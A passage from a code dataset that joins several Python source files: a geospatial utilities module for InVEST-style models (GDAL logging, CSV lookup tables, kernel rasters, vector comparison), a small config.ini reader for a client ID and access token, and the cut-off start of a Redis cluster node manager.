GDAL 3.0 spatial references no longer ignore Geographic CRS Axis Order\n# and conform to Lat first, Lon Second. Transforms expect (lat, lon) order\n# as opposed to the GIS friendly (lon, lat). See\n# https://trac.osgeo.org/gdal/wiki/rfc73_proj6_wkt2_srsbarn Axis order\n# issues. SetAxisMappingStrategy(osr.OAMS_TRADITIONAL_GIS_ORDER) swaps the\n# axis order, which will use Lon,Lat order for Geographic CRS, but otherwise\n# leaves Projected CRS alone\nDEFAULT_OSR_AXIS_MAPPING_STRATEGY = osr.OAMS_TRADITIONAL_GIS_ORDER\n\n\n@contextlib.contextmanager\ndef capture_gdal_logging():\n \"\"\"Context manager for logging GDAL errors with python logging.\n\n GDAL error messages are logged via python's logging system, at a severity\n that corresponds to a log level in ``logging``. 
Error messages are logged\n with the ``osgeo.gdal`` logger.\n\n Args:\n ``None``\n\n Returns:\n ``None``\n \"\"\"\n osgeo_logger = logging.getLogger('osgeo')\n\n def _log_gdal_errors(err_level, err_no, err_msg):\n \"\"\"Log error messages to osgeo.\n\n All error messages are logged with reasonable ``logging`` levels based\n on the GDAL error level.\n\n Args:\n err_level (int): The GDAL error level (e.g. ``gdal.CE_Failure``)\n err_no (int): The GDAL error number. For a full listing of error\n codes, see: http://www.gdal.org/cpl__error_8h.html\n err_msg (string): The error string.\n\n Returns:\n ``None``\n \"\"\"\n osgeo_logger.log(\n level=GDAL_ERROR_LEVELS[err_level],\n msg='[errno {err}] {msg}'.format(\n err=err_no, msg=err_msg.replace('\\n', ' ')))\n\n gdal.PushErrorHandler(_log_gdal_errors)\n try:\n yield\n finally:\n gdal.PopErrorHandler()\n\n\ndef _format_time(seconds):\n \"\"\"Render the integer number of seconds as a string. Returns a string.\"\"\"\n hours, remainder = divmod(seconds, 3600)\n minutes, seconds = divmod(remainder, 60)\n\n hours = int(hours)\n minutes = int(minutes)\n\n if hours > 0:\n return \"%sh %sm %ss\" % (hours, minutes, seconds)\n\n if minutes > 0:\n return \"%sm %ss\" % (minutes, seconds)\n return \"%ss\" % seconds\n\n\n@contextlib.contextmanager\ndef prepare_workspace(\n workspace, name, logging_level=logging.NOTSET, exclude_threads=None):\n \"\"\"Prepare the workspace.\"\"\"\n if not os.path.exists(workspace):\n os.makedirs(workspace)\n\n logfile = os.path.join(\n workspace,\n 'InVEST-{modelname}-log-{timestamp}.txt'.format(\n modelname='-'.join(name.replace(':', '').split(' ')),\n timestamp=datetime.now().strftime(\"%Y-%m-%d--%H_%M_%S\")))\n\n with capture_gdal_logging(), log_to_file(logfile,\n exclude_threads=exclude_threads,\n logging_level=logging_level):\n with sandbox_tempdir(dir=workspace):\n logging.captureWarnings(True)\n LOGGER.info('Writing log messages to %s', logfile)\n start_time = time.time()\n try:\n yield\n finally:\n LOGGER.info('Elapsed time: %s',\n _format_time(round(time.time() - start_time, 2)))\n logging.captureWarnings(False)\n\n\nclass ThreadFilter(logging.Filter):\n \"\"\"Filters out log messages issued by the given thread.\n\n Any log messages generated by a thread with the name matching the\n threadname provided to the constructor will be excluded.\n \"\"\"\n def __init__(self, thread_name):\n \"\"\"Construct a ThreadFilter.\n\n Args:\n thread_name (string): The thread name to filter on.\n\n \"\"\"\n logging.Filter.__init__(self)\n self.thread_name = thread_name\n\n def filter(self, record):\n \"\"\"Filter the given log record.\n\n Args:\n record (log record): The log record to filter.\n\n Returns:\n True if the record should be included, false if not.\n \"\"\"\n if record.threadName == self.thread_name:\n return False\n return True\n\n\n@contextlib.contextmanager\ndef log_to_file(logfile, exclude_threads=None, logging_level=logging.NOTSET,\n log_fmt=LOG_FMT, date_fmt=None):\n \"\"\"Log all messages within this context to a file.\n\n Args:\n logfile (string): The path to where the logfile will be written.\n If there is already a file at this location, it will be\n overwritten.\n exclude_threads=None (list): If None, logging from all threads will be\n included in the log. If a list, it must be a list of string thread\n names that should be excluded from logging in this file.\n logging_level=logging.NOTSET (int): The logging threshold. Log\n messages with a level less than this will be automatically\n excluded from the logfile. 
The default value (``logging.NOTSET``)\n will cause all logging to be captured.\n log_fmt=LOG_FMT (string): The logging format string to use. If not\n provided, ``utils.LOG_FMT`` will be used.\n date_fmt (string): The logging date format string to use.\n If not provided, ISO8601 format will be used.\n\n\n Yields:\n ``handler``: An instance of ``logging.FileHandler`` that\n represents the file that is being written to.\n\n Returns:\n ``None``\n \"\"\"\n try:\n if os.path.exists(logfile):\n LOGGER.warning('Logfile %s exists and will be overwritten',\n logfile)\n except SystemError:\n # This started happening in Windows tests:\n # SystemError: returned NULL without\n # setting an error\n # Looking at https://bugs.python.org/issue28040#msg276223, this might\n # be a low-level python error.\n pass\n\n handler = logging.FileHandler(logfile, 'w', encoding='UTF-8')\n formatter = logging.Formatter(log_fmt, date_fmt)\n root_logger = logging.getLogger()\n root_logger.setLevel(logging.NOTSET)\n root_logger.addHandler(handler)\n handler.setFormatter(formatter)\n handler.setLevel(logging_level)\n\n if exclude_threads is not None:\n for threadname in exclude_threads:\n thread_filter = ThreadFilter(threadname)\n handler.addFilter(thread_filter)\n\n try:\n yield handler\n finally:\n handler.close()\n root_logger.removeHandler(handler)\n\n\n@contextlib.contextmanager\ndef sandbox_tempdir(suffix='', prefix='tmp', dir=None):\n \"\"\"Create a temporary directory for this context and clean it up on exit.\n\n Parameters are identical to those for :py:func:`tempfile.mkdtemp`.\n\n When the context manager exits, the created temporary directory is\n recursively removed.\n\n Args:\n suffix='' (string): a suffix for the name of the directory.\n prefix='tmp' (string): the prefix to use for the directory name.\n dir=None (string or None): If a string, a directory that should be\n the parent directory of the new temporary directory. If None,\n tempfile will determine the appropriate tempdir to use as the\n parent folder.\n\n Yields:\n ``sandbox`` (string): The path to the new folder on disk.\n\n Returns:\n ``None``\n \"\"\"\n sandbox = tempfile.mkdtemp(suffix=suffix, prefix=prefix, dir=dir)\n\n try:\n yield sandbox\n finally:\n try:\n shutil.rmtree(sandbox)\n except OSError:\n LOGGER.exception('Could not remove sandbox %s', sandbox)\n\n\ndef make_suffix_string(args, suffix_key):\n \"\"\"Make an InVEST appropriate suffix string.\n\n Creates an InVEST appropriate suffix string given the args dictionary and\n suffix key. 
In general, prepends an '_' when necessary and generates an\n empty string when necessary.\n\n Args:\n args (dict): the classic InVEST model parameter dictionary that is\n passed to `execute`.\n suffix_key (string): the key used to index the base suffix.\n\n Returns:\n If `suffix_key` is not in `args`, or `args['suffix_key']` is \"\"\n return \"\",\n If `args['suffix_key']` starts with '_' return `args['suffix_key']`\n else return '_'+`args['suffix_key']`\n \"\"\"\n try:\n file_suffix = args[suffix_key]\n if file_suffix != \"\" and not file_suffix.startswith('_'):\n file_suffix = '_' + file_suffix\n except KeyError:\n file_suffix = ''\n\n return file_suffix\n\n\ndef exponential_decay_kernel_raster(expected_distance, kernel_filepath):\n \"\"\"Create a raster-based exponential decay kernel.\n\n The raster created will be a tiled GeoTiff, with 256x256 memory blocks.\n\n Args:\n expected_distance (int or float): The distance (in pixels) of the\n kernel's radius, the distance at which the value of the decay\n function is equal to `1/e`.\n kernel_filepath (string): The path to the file on disk where this\n kernel should be stored. If this file exists, it will be\n overwritten.\n\n Returns:\n None\n \"\"\"\n max_distance = expected_distance * 5\n kernel_size = int(numpy.round(max_distance * 2 + 1))\n\n driver = gdal.GetDriverByName('GTiff')\n kernel_dataset = driver.Create(\n kernel_filepath.encode('utf-8'), kernel_size, kernel_size, 1,\n gdal.GDT_Float32, options=[\n 'BIGTIFF=IF_SAFER', 'TILED=YES', 'BLOCKXSIZE=256',\n 'BLOCKYSIZE=256'])\n\n # Make some kind of geotransform, it doesn't matter what but\n # will make GIS libraries behave better if it's all defined\n kernel_dataset.SetGeoTransform([0, 1, 0, 0, 0, -1])\n srs = osr.SpatialReference()\n srs.SetWellKnownGeogCS('WGS84')\n kernel_dataset.SetProjection(srs.ExportToWkt())\n\n kernel_band = kernel_dataset.GetRasterBand(1)\n kernel_band.SetNoDataValue(-9999)\n\n cols_per_block, rows_per_block = kernel_band.GetBlockSize()\n\n n_cols = kernel_dataset.RasterXSize\n n_rows = kernel_dataset.RasterYSize\n\n n_col_blocks = int(math.ceil(n_cols / float(cols_per_block)))\n n_row_blocks = int(math.ceil(n_rows / float(rows_per_block)))\n\n integration = 0.0\n for row_block_index in range(n_row_blocks):\n row_offset = row_block_index * rows_per_block\n row_block_width = n_rows - row_offset\n if row_block_width > rows_per_block:\n row_block_width = rows_per_block\n\n for col_block_index in range(n_col_blocks):\n col_offset = col_block_index * cols_per_block\n col_block_width = n_cols - col_offset\n if col_block_width > cols_per_block:\n col_block_width = cols_per_block\n\n # Numpy creates index rasters as ints by default, which sometimes\n # creates problems on 32-bit builds when we try to add Int32\n # matrices to float64 matrices.\n row_indices, col_indices = numpy.indices((row_block_width,\n col_block_width),\n dtype=float)\n\n row_indices += float(row_offset - max_distance)\n col_indices += float(col_offset - max_distance)\n\n kernel_index_distances = numpy.hypot(\n row_indices, col_indices)\n kernel = numpy.where(\n kernel_index_distances > max_distance, 0.0,\n numpy.exp(-kernel_index_distances / expected_distance))\n integration += numpy.sum(kernel)\n\n kernel_band.WriteArray(kernel, xoff=col_offset,\n yoff=row_offset)\n\n # Need to flush the kernel's cache to disk before opening up a new Dataset\n # object in interblocks()\n kernel_band.FlushCache()\n kernel_dataset.FlushCache()\n\n for block_data in pygeoprocessing.iterblocks(\n (kernel_filepath, 
1), offset_only=True):\n kernel_block = kernel_band.ReadAsArray(**block_data)\n kernel_block /= integration\n kernel_band.WriteArray(kernel_block, xoff=block_data['xoff'],\n yoff=block_data['yoff'])\n\n kernel_band.FlushCache()\n kernel_dataset.FlushCache()\n kernel_band = None\n kernel_dataset = None\n\n\ndef build_file_registry(base_file_path_list, file_suffix):\n \"\"\"Combine file suffixes with key names, base filenames, and directories.\n\n Args:\n base_file_tuple_list (list): a list of (dict, path) tuples where\n the dictionaries have a 'file_key': 'basefilename' pair, or\n 'file_key': list of 'basefilename's. 'path'\n indicates the file directory path to prepend to the basefile name.\n file_suffix (string): a string to append to every filename, can be\n empty string\n\n Returns:\n dictionary of 'file_keys' from the dictionaries in\n `base_file_tuple_list` mapping to full file paths with suffixes or\n lists of file paths with suffixes depending on the original type of\n the 'basefilename' pair.\n\n Raises:\n ValueError if there are duplicate file keys or duplicate file paths.\n ValueError if a path is not a string or a list of strings.\n \"\"\"\n all_paths = set()\n duplicate_keys = set()\n duplicate_paths = set()\n f_reg = {}\n\n def _build_path(base_filename, path):\n \"\"\"Internal helper to avoid code duplication.\"\"\"\n pre, post = os.path.splitext(base_filename)\n full_path = os.path.join(path, pre+file_suffix+post)\n\n # Check for duplicate keys or paths\n if full_path in all_paths:\n duplicate_paths.add(full_path)\n else:\n all_paths.add(full_path)\n return full_path\n\n for base_file_dict, path in base_file_path_list:\n for file_key, file_payload in base_file_dict.items():\n # check for duplicate keys\n if file_key in f_reg:\n duplicate_keys.add(file_key)\n else:\n # handle the case whether it's a filename or a list of strings\n if isinstance(file_payload, str):\n full_path = _build_path(file_payload, path)\n f_reg[file_key] = full_path\n elif isinstance(file_payload, list):\n f_reg[file_key] = []\n for filename in file_payload:\n full_path = _build_path(filename, path)\n f_reg[file_key].append(full_path)\n else:\n raise ValueError(\n \"Unknown type in base_file_dict[%s]=%s\" % (\n file_key, path))\n\n if len(duplicate_paths) > 0 or len(duplicate_keys):\n raise ValueError(\n \"Cannot consolidate because of duplicate paths or keys: \"\n \"duplicate_keys: %s duplicate_paths: %s\" % (\n duplicate_keys, duplicate_paths))\n\n return f_reg\n\n\ndef build_lookup_from_csv(\n table_path, key_field, column_list=None, to_lower=True):\n \"\"\"Read a CSV table into a dictionary indexed by ``key_field``.\n\n Creates a dictionary from a CSV whose keys are unique entries in the CSV\n table under the column named by ``key_field`` and values are dictionaries\n indexed by the other columns in ``table_path`` including ``key_field``\n whose values are the values on that row of the CSV table.\n\n If an entire row is NA/NaN (including ``key_field``) then it is dropped\n from the table and a warning is given of the dropped rows.\n\n Args:\n table_path (string): path to a CSV file containing at\n least the header key_field\n key_field: (string): a column in the CSV file at `table_path` that\n can uniquely identify each row in the table and sets the row index.\n column_list (list): a list of column names to subset from the CSV\n file, default=None\n to_lower (bool): if True, converts all unicode in the CSV,\n including headers and values to lowercase, otherwise uses raw\n string values. 
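# --- Minimal in-memory illustration of the kernel math above ---
# Reproduces just the arithmetic of exponential_decay_kernel_raster without
# any GDAL/GeoTiff plumbing: value = exp(-d / expected_distance), clipped to
# zero beyond max_distance = 5 * expected_distance, then normalized so the
# kernel sums to 1. Purely a sketch for illustration.
def toy_decay_kernel(expected_distance):
    max_distance = expected_distance * 5
    size = int(numpy.round(max_distance * 2 + 1))
    rows, cols = numpy.indices((size, size), dtype=float)
    dist = numpy.hypot(rows - max_distance, cols - max_distance)
    kernel = numpy.where(dist > max_distance, 0.0,
                         numpy.exp(-dist / expected_distance))
    return kernel / kernel.sum()


# toy_decay_kernel(2.0).shape == (21, 21); the result sums to ~1.0 and the
# center pixel holds the largest weight (exp(0) before normalization).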
default=True.\n\n Returns:\n lookup_dict (dict): a dictionary of the form \n {key_field_0: {csv_header_0: value0, csv_header_1: value1...},\n key_field_1: {csv_header_0: valuea, csv_header_1: valueb...}}\n\n if ``to_lower`` all strings including key_fields and values are\n converted to lowercase unicode.\n\n Raise:\n ValueError\n If ValueError occurs during conversion to dictionary.\n KeyError\n If ``key_field`` is not present during ``set_index`` call.\n \"\"\"\n # Reassign to avoid mutation\n col_list = column_list\n # if a list of columns are provided to use and return, make sure\n # 'key_field' is one of them.\n if col_list and key_field not in col_list:\n col_list.append(key_field)\n\n table = read_csv_to_dataframe(\n table_path, to_lower=to_lower, sep=None, index_col=False,\n engine='python')\n\n # if 'to_lower`, case handling is done before trying to access the data.\n # the columns are stripped of leading/trailing whitespace in\n # ``read_csv_to_dataframe``, and also lowercased if ``to_lower`` so we only\n # need to convert the rest of the table.\n if to_lower:\n key_field = key_field.lower()\n # lowercase column names\n if col_list:\n col_list = [col.lower() for col in col_list]\n # lowercase values\n table = table.applymap(\n lambda x: x.lower() if isinstance(x, str) else x)\n\n # Set 'key_field' as the index of the dataframe\n try:\n table.set_index(key_field, drop=False, inplace=True)\n except KeyError:\n # If 'key_field' is not a column then KeyError is raised for using\n # it as the index column\n LOGGER.error(f\"'key_field' : '{key_field}' could not be found as a\"\n f\" column in the table. Table path: {table_path}.\")\n raise\n\n # Subset dataframe by columns if desired\n if col_list:\n table = table.loc[:, col_list]\n\n # look for NaN values and warn if any are found.\n table_na = table.isna()\n if table_na.values.any():\n LOGGER.warning(\n f\"Empty or NaN values were found in the table: {table_path}.\")\n # look to see if an entire row is NA values\n table_na_rows = table_na.all(axis=1)\n na_rows = table_na_rows.index[table_na_rows].tolist()\n # if a completely empty row, drop it\n if na_rows:\n LOGGER.warning(\n \"Encountered an entirely blank row on line(s)\"\n f\" {[x+2 for x in na_rows]}. Dropping rows from table.\")\n table.dropna(how=\"all\", inplace=True)\n # fill the rest of empty or NaN values with empty string\n table.fillna(value=\"\", inplace=True)\n try:\n lookup_dict = table.to_dict(orient='index')\n except ValueError:\n # If 'key_field' is not unique then a value error is raised.\n LOGGER.error(f\"The 'key_field' : '{key_field}' column values are not\"\n f\" unique: {table.index.tolist()}\")\n raise\n\n return lookup_dict\n\n\ndef read_csv_to_dataframe(\n path, to_lower=False, sep=None, encoding=None, engine='python',\n **kwargs):\n \"\"\"Return a dataframe representation of the CSV.\n\n Wrapper around ``pandas.read_csv`` that standardizes the column names by\n stripping leading/trailing whitespace and optionally making all lowercase.\n This helps avoid common errors caused by user-supplied CSV files with\n column names that don't exactly match the specification.\n\n Args:\n path (string): path to a CSV file\n to_lower (bool): if True, convert all column names to lowercase\n sep: separator to pass to pandas.read_csv. Defaults to None, which\n lets the Python engine infer the separator (if engine='python').\n encoding (string): name of encoding codec to pass to `pandas.read_csv`.\n Defaults to None. 
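# --- Hedged usage sketch for build_lookup_from_csv above ---
# Writes a tiny throwaway CSV and reads it back into the nested-dict form the
# function documents: {key_field value -> {column -> value}}. The file name,
# columns and values are invented purely for this example; pandas must be
# installed (it is imported at the top of this module).
_demo_csv = tempfile.NamedTemporaryFile(
    mode='w', suffix='.csv', delete=False, newline='')
_demo_csv.write("lucode,Description,c_above\n1,Forest,140\n2,Grassland,30\n")
_demo_csv.close()

_lookup = build_lookup_from_csv(_demo_csv.name, 'lucode')
# _lookup[1] -> {'lucode': 1, 'description': 'forest', 'c_above': 140}
# (headers and string values are lowercased because to_lower defaults to True)

os.remove(_demo_csv.name)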
Setting engine='python' when encoding=None allows\n a lot of non-UTF8 encodings to be read without raising an error.\n Any special characters in other encodings may get replaced with the\n replacement character.\n If encoding=None, and the file begins with a BOM, the encoding gets\n set to 'utf-8-sig'; otherwise the BOM causes an error.\n engine (string): kwarg for pandas.read_csv: 'c', 'python', or None.\n Defaults to 'python' (see note about encoding).\n **kwargs: any kwargs that are valid for ``pandas.read_csv``\n\n Returns:\n pandas.DataFrame with the contents of the given CSV\n\n \"\"\"\n # Check if the file encoding is UTF-8 BOM first\n # allow encoding kwarg to override this if it's provided\n if not encoding and has_utf8_bom(path):\n encoding = 'utf-8-sig'\n try:\n dataframe = pandas.read_csv(path, engine=engine, encoding=encoding,\n sep=sep, **kwargs)\n except UnicodeDecodeError as error:\n LOGGER.error(\n f'{path} must be encoded as utf-8 or ASCII')\n raise error\n\n # this won't work on integer types, which happens if you set header=None\n # however, there's little reason to use this function if there's no header\n dataframe.columns = dataframe.columns.str.strip()\n if to_lower:\n dataframe.columns = dataframe.columns.str.lower()\n\n return dataframe\n\n\ndef make_directories(directory_list):\n \"\"\"Create directories in `directory_list` if they do not already exist.\"\"\"\n if not isinstance(directory_list, list):\n raise ValueError(\n \"Expected `directory_list` to be an instance of `list` instead \"\n \"got type %s instead\", type(directory_list))\n\n for path in directory_list:\n # From http://stackoverflow.com/a/14364249/42897\n try:\n os.makedirs(path)\n except OSError:\n if not os.path.isdir(path):\n raise\n\n\ndef mean_pixel_size_and_area(pixel_size_tuple):\n \"\"\"Convert to mean and raise Exception if they are not close.\n\n Parameter:\n pixel_size_tuple (tuple): a 2 tuple indicating the x/y size of a\n pixel.\n\n Returns:\n tuple of (mean absolute average of pixel_size, area of pixel size)\n\n Raises:\n ValueError if the dimensions of pixel_size_tuple are not almost\n square.\n\n \"\"\"\n x_size, y_size = abs(pixel_size_tuple[0]), abs(pixel_size_tuple[1])\n if not numpy.isclose(x_size, y_size):\n raise ValueError(\n \"pixel size is not square. dimensions: %s\" % repr(\n pixel_size_tuple))\n\n return (x_size, x_size*y_size)\n\n\ndef create_coordinate_transformer(\n base_ref, target_ref,\n osr_axis_mapping_strategy=DEFAULT_OSR_AXIS_MAPPING_STRATEGY):\n \"\"\"Create a spatial reference coordinate transformation function.\n\n Args:\n base_ref (osr spatial reference): A defined spatial reference to\n transform FROM\n target_ref (osr spatial reference): A defined spatial reference\n to transform TO\n osr_axis_mapping_strategy (int): OSR axis mapping strategy for\n ``SpatialReference`` objects. Defaults to\n ``utils.DEFAULT_OSR_AXIS_MAPPING_STRATEGY``. 
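# --- Hedged sketch of the UTF-8 BOM handling described above ---
# A file whose first bytes are codecs.BOM_UTF8 is detected and read with the
# 'utf-8-sig' codec so the marker does not leak into the first column name.
# The throwaway file below exists only for this illustration; codecs, os and
# tempfile are already imported at the top of this module.
_bom_file = tempfile.NamedTemporaryFile(mode='wb', suffix='.csv', delete=False)
_bom_file.write(codecs.BOM_UTF8 + b"id,value\n1,2\n")
_bom_file.close()

with open(_bom_file.name, 'rb') as _f:
    assert _f.readline().startswith(codecs.BOM_UTF8)  # same check as has_utf8_bom

with open(_bom_file.name, encoding='utf-8-sig') as _f:
    assert _f.readline() == "id,value\n"  # BOM stripped by the codec

os.remove(_bom_file.name)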
This parameter should\n not be changed unless you know what you are doing.\n\n Returns:\n An OSR Coordinate Transformation object\n\n \"\"\"\n # Make a copy of the base and target spatial references to avoid side\n # effects from mutation of setting the axis mapping strategy\n base_ref_wkt = base_ref.ExportToWkt()\n target_ref_wkt = target_ref.ExportToWkt()\n\n base_ref_copy = osr.SpatialReference()\n target_ref_copy = osr.SpatialReference()\n\n base_ref_copy.ImportFromWkt(base_ref_wkt)\n target_ref_copy.ImportFromWkt(target_ref_wkt)\n\n base_ref_copy.SetAxisMappingStrategy(osr_axis_mapping_strategy)\n target_ref_copy.SetAxisMappingStrategy(osr_axis_mapping_strategy)\n\n transformer = osr.CreateCoordinateTransformation(\n base_ref_copy, target_ref_copy)\n return transformer\n\n\ndef _assert_vectors_equal(\n expected_vector_path, actual_vector_path, field_value_atol=1e-3):\n \"\"\"Assert two vectors are equal.\n\n Assert spatial reference, feature count, geometries, field names, and\n values are equal with no respect to order of field names or geometries.\n\n Args:\n actual_vector_path (string): path on disk to a gdal Vector dataset.\n expected_vector_path (string): path on disk to a gdal Vector dataset\n to use as the ground truth.\n field_value_atol (float): the absolute tolerance for comparing field\n attribute values, default=1e-3.\n\n Returns:\n None on success\n\n Raise:\n AssertionError\n If vector projections, feature counts, field names, or geometries\n do not match.\n \"\"\"\n try:\n # Open vectors\n actual_vector = gdal.OpenEx(actual_vector_path, gdal.OF_VECTOR)\n actual_layer = actual_vector.GetLayer()\n expected_vector = gdal.OpenEx(expected_vector_path, gdal.OF_VECTOR)\n expected_layer = expected_vector.GetLayer()\n\n # Check projections\n expected_projection = expected_layer.GetSpatialRef()\n expected_projection_wkt = expected_projection.ExportToWkt()\n actual_projection = actual_layer.GetSpatialRef()\n actual_projection_wkt = actual_projection.ExportToWkt()\n if expected_projection_wkt != actual_projection_wkt:\n raise AssertionError(\n \"Vector projections are not the same. \\n\"\n f\"Expected projection wkt: {expected_projection_wkt}. \\n\"\n f\"Actual projection wkt: {actual_projection_wkt}. \")\n\n # Check feature count\n actual_feat_count = actual_layer.GetFeatureCount()\n expected_feat_count = expected_layer.GetFeatureCount()\n if expected_feat_count != actual_feat_count:\n raise AssertionError(\n \"Vector feature counts are not the same. \\n\"\n f\"Expected feature count: {expected_feat_count}. \\n\"\n f\"Actual feature count: {actual_feat_count}. \")\n\n # Check field names\n expected_field_names = [field.name for field in expected_layer.schema]\n actual_field_names = [field.name for field in actual_layer.schema]\n if sorted(expected_field_names) != sorted(actual_field_names):\n raise AssertionError(\n \"Vector field names are not the same. \\n\"\n f\"Expected field names: {sorted(expected_field_names)}. \\n\"\n f\"Actual field names: {sorted(actual_field_names)}. 
\")\n\n # Check field values and geometries\n for expected_feature in expected_layer:\n fid = expected_feature.GetFID()\n expected_values = [\n expected_feature.GetField(field)\n for field in expected_field_names]\n\n actual_feature = actual_layer.GetFeature(fid)\n actual_values = [\n actual_feature.GetField(field)\n for field in expected_field_names]\n\n for av, ev in zip(actual_values, expected_values):\n if av is not None:\n # Number comparison\n if isinstance(av, int) or isinstance(av, float):\n if not numpy.allclose(numpy.array([av]),\n numpy.array([ev]),\n atol=field_value_atol):\n raise AssertionError(\n \"Vector field values are not equal: \\n\"\n f\"Expected value: {ev}. \\n\"\n f\"Actual value: {av}. \")\n # String and other comparison\n else:\n if av != ev:\n raise AssertionError(\n \"Vector field values are not equal. \\n\"\n f\"Expected value : {ev}. \\n\"\n f\"Actual value : {av}. \")\n else:\n if ev is not None:\n raise AssertionError(\n \"Vector field values are not equal: \\n\"\n f\"Expected value: {ev}. \\n\"\n f\"Actual value: {av}. \")\n\n expected_geom = expected_feature.GetGeometryRef()\n expected_geom_wkt = expected_geom.ExportToWkt()\n actual_geom = actual_feature.GetGeometryRef()\n actual_geom_wkt = actual_geom.ExportToWkt()\n expected_geom_shapely = loads(expected_geom_wkt)\n actual_geom_shapely = loads(actual_geom_wkt)\n # Try comparing geoms exactly equal allowing for different\n # geometry ordering\n geoms_equal = expected_geom_shapely.equals(actual_geom_shapely)\n if not geoms_equal:\n # Try almost_equal allowing for precision differences\n geoms_almost_eq = expected_geom_shapely.almost_equals(\n actual_geom_shapely)\n if not geoms_almost_eq:\n raise AssertionError(\n \"Vector geometry assertion fail. \\n\"\n f\"Expected geometry: {expected_geom_wkt}. \\n\"\n f\"Actual geometry: {actual_geom_wkt}. \")\n\n expected_feature = None\n actual_feature = None\n finally:\n actual_layer = None\n actual_vector = None\n expected_layer = None\n expected_vector = None\n\n return None\n\n\ndef has_utf8_bom(textfile_path):\n \"\"\"Determine if the text file has a UTF-8 byte-order marker.\n\n Args:\n textfile_path (str): The path to a file on disk.\n\n Returns:\n A bool indicating whether the textfile has a BOM. If ``True``, a BOM\n is present.\n\n \"\"\"\n with open(textfile_path, 'rb') as file_obj:\n first_line = file_obj.readline()\n return first_line.startswith(codecs.BOM_UTF8)\n\n\ndef reclassify_raster(\n raster_path_band, value_map, target_raster_path, target_datatype,\n target_nodata, error_details):\n \"\"\"A wrapper function for calling ``pygeoprocessing.reclassify_raster``.\n\n This wrapper function is helpful when added as a ``TaskGraph.task`` so\n a better error message can be provided to the users if a\n ``pygeoprocessing.ReclassificationMissingValuesError`` is raised.\n\n Args:\n raster_path_band (tuple): a tuple including file path to a raster\n and the band index to operate over. 
ex: (path, band_index)\n value_map (dictionary): a dictionary of values of\n {source_value: dest_value, ...} where source_value's type is the\n same as the values in ``base_raster_path`` at band ``band_index``.\n Must contain at least one value.\n target_raster_path (string): target raster output path; overwritten if\n it exists\n target_datatype (gdal type): the numerical type for the target raster\n target_nodata (numerical type): the nodata value for the target raster\n Must be the same type as target_datatype\n error_details (dict): a dictionary with key value pairs that provide\n more context for a raised\n ``pygeoprocessing.ReclassificationMissingValuesError``.\n keys must be {'raster_name', 'column_name', 'table_name'}. Values\n each key represent:\n\n 'raster_name' - string for the raster name being reclassified\n 'column_name' - name of the table column that ``value_map`` \n dictionary keys came from.\n 'table_name' - table name that ``value_map`` came from.\n\n Returns:\n None\n\n Raises:\n ValueError if ``values_required`` is ``True`` and a pixel value from\n ``raster_path_band`` is not a key in ``value_map``.\n \"\"\"\n # Error early if 'error_details' keys are invalid\n raster_name = error_details['raster_name']\n column_name = error_details['column_name']\n table_name = error_details['table_name']\n\n try:\n pygeoprocessing.reclassify_raster(\n raster_path_band, value_map, target_raster_path, target_datatype,\n target_nodata, values_required=True)\n except pygeoprocessing.ReclassificationMissingValuesError as err:\n error_message = (\n f\"Values in the {raster_name} raster were found that are not\"\n f\" represented under the '{column_name}' column of the\"\n f\" {table_name} table. The missing values found in the\"\n f\" {raster_name} raster but not the table are:\"\n f\" {err.missing_values}.\")\n raise ValueError(error_message)\n"} {"ext": "py", "sha": "1a2ef3fa7e4c4bad44a2303092c2343e9f7d4fe5", "content": "from configparser import ConfigParser\n\n\nclass GetconfigData:\n \"\"\"\n Class used to access config.ini data\n \"\"\"\n\n def __init__(self):\n # instantiate\n self.config = ConfigParser()\n # parse existing file\n self.config.read('config.ini')\n\n def GetClientId():\n \"\"\"\n Function used by main.py to get the Client ID from the config.ini file\n\n Returns:\n client_ID: The client ID used to get data \n \"\"\"\n # Create object\n get_client_id = GetconfigData()\n # read values from a section\n client_id = get_client_id.config.get('config', 'client_id')\n\n return client_id\n\n def GetAccessToken():\n \"\"\"\n Function used by main.py to get the Access Token from the config.ini file\n\n Returns:\n access_token: The Access Token used to get data \n \"\"\"\n # Create object\n get_access_token = GetconfigData()\n # read values from a section\n access_token = get_access_token.config.get('config', 'access_token')\n\n return access_token\n"} {"ext": "py", "sha": "1a2ef438f0bf0c43b3ee10f8857977d69781a6f3", "content": "# -*- coding: utf-8 -*-\n\n# python std lib\nimport random\n\n# rediscluster imports\nfrom .crc import crc16\nfrom .exceptions import RedisClusterException, RedisClusterConfigError\n\n# 3rd party imports\nfrom redis import Redis\nfrom redis._compat import unicode, long, basestring\nfrom redis.connection import Encoder\nfrom redis import ConnectionError, TimeoutError, ResponseError\n\n\nclass NodeManager(object):\n \"\"\"\n \"\"\"\n RedisClusterHashSlots = 16384\n\n def __init__(self, startup_nodes=None, reinitialize_steps=None, 
skip_full_coverage_check=False, nodemanager_follow_cluster=False,\n host_port_remap=None, **connection_kwargs):\n \"\"\"\n :skip_full_coverage_check:\n Skips the check of cluster-require-full-coverage config, useful for clusters\n without the CONFIG command (like aws)\n :nodemanager_follow_cluster:\n The node manager will during initialization try the last set of nodes that\n it was operating on. This will allow the client to drift along side the cluster\n if the cluster nodes move around alot.\n \"\"\"\n self.connection_kwargs = connection_kwargs\n self.nodes = {}\n self.slots = {}\n self.startup_nodes = [] if startup_nodes is None else startup_nodes\n self.orig_startup_nodes = [node for node in self.startup_nodes]\n self.reinitialize_counter = 0\n self.reinitialize_steps = reinitialize_steps or 25\n self._skip_full_coverage_check = skip_full_coverage_check\n self.nodemanager_follow_cluster = nodemanager_follow_cluster\n self.encoder = Encoder(\n connection_kwargs.get('encoding', 'utf-8'),\n connection_kwargs.get('encoding_errors', 'strict'),\n connection_kwargs.get('decode_responses', False)\n )\n self._validate_host_port_remap(host_port_remap)\n self.host_port_remap = host_port_remap\n\n if not self.startup_nodes:\n raise RedisClusterException(\"No startup nodes provided\")\n\n def _validate_host_port_remap(self, host_port_remap):\n \"\"\"\n Helper method that validates all entries in the host_port_remap config.\n \"\"\"\n if host_port_remap is None:\n # Nothing to validate if config not set\n return\n\n if not isinstance(host_port_remap, list):\n raise RedisClusterConfigError(\"host_port_remap must be a list\")\n\n for item in host_port_remap:\n if not isinstance(item, dict):\n raise RedisClusterConfigError(\"items inside host_port_remap list must be of dict type\")\n\n # If we have from_host, we must have a to_host option to allow for translation to work\n if ('from_host' in item and 'to_host' not in item) or ('from_host' not in item and 'to_host' in item):\n raise RedisClusterConfigError(\"Both from_host and to_host must be present in remap item if either is defined\")\n\n if ('from_port' in item and 'to_port' not in item) or ('from_port' not in item and 'to_port' in item):\n raise RedisClusterConfigError(\"Both from_port and to_port must be present in remap item\")\n\n def 